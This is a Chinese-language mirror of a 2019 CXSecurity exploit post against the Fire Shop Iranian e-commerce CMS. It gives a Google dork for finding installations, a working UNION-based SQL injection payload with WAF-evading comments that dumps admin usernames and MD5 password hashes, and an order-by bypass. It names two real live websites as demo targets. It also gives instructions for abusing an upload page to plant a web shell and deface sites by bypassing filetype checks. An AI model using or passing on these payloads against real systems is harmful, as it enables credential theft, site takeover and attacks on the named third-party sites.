fire Shop IRANIAN CMS SQL injection & Remote File Upload - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1603074 漏洞类型
发布时间 2019-05-10 更新时间 2019-05-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050109
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: fire Shop IRANIAN CMS SQL injection & Remote File Upload
# Date: 2019-05-10
# Dork : intext:"قدرت گرفته از فروشگاه ساز فايرشاپ"
# Exploit Author: S I R M A X
# Vendor Homepage: firedesign.ir
# Version: Final Version
# Tested on: win,linux
=================================================================================
                                             [SQL injection]     

[+] Method ( Sql injection ) Nullix Security Team of IRan
[+] Admin Login Page : www.[Target].com/admin.php
[+]  parameter  : ID == php?ID=
=================
Mode Hash : MD5 
=================
Exploit ==> 
category.php?id=1' /*!50000UNION*/ /*!50000SELECT*/ 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(fireshop_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,username,0x3c62723e,0x70617373,0x203d3d3e20,password,0x3c62723e,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14-- -
<-> Method Bypass[ Order by ] ======>  you can use >> =  category.php?id=15' order by asc-- -
=================================================================================
Demo:
[+] http://perfectmarket.biz/sss/category.php?id=[SQL]
[+] http://www.banehsalami.com/غذاساز-فیلیپس-HR7628/category.php?id=[SQL]
=================================================================================
  Remote File upload
============================

[+] RFU‌ Method 
<+> POC : http://www.banehsalami.com/upload.php

<-> Add URL‌ site.com/upload.php
<+> You can Upload Shell and Def 
<-> for Bypass Filetype 
<=> using Tamper Data Or Charles 

======================================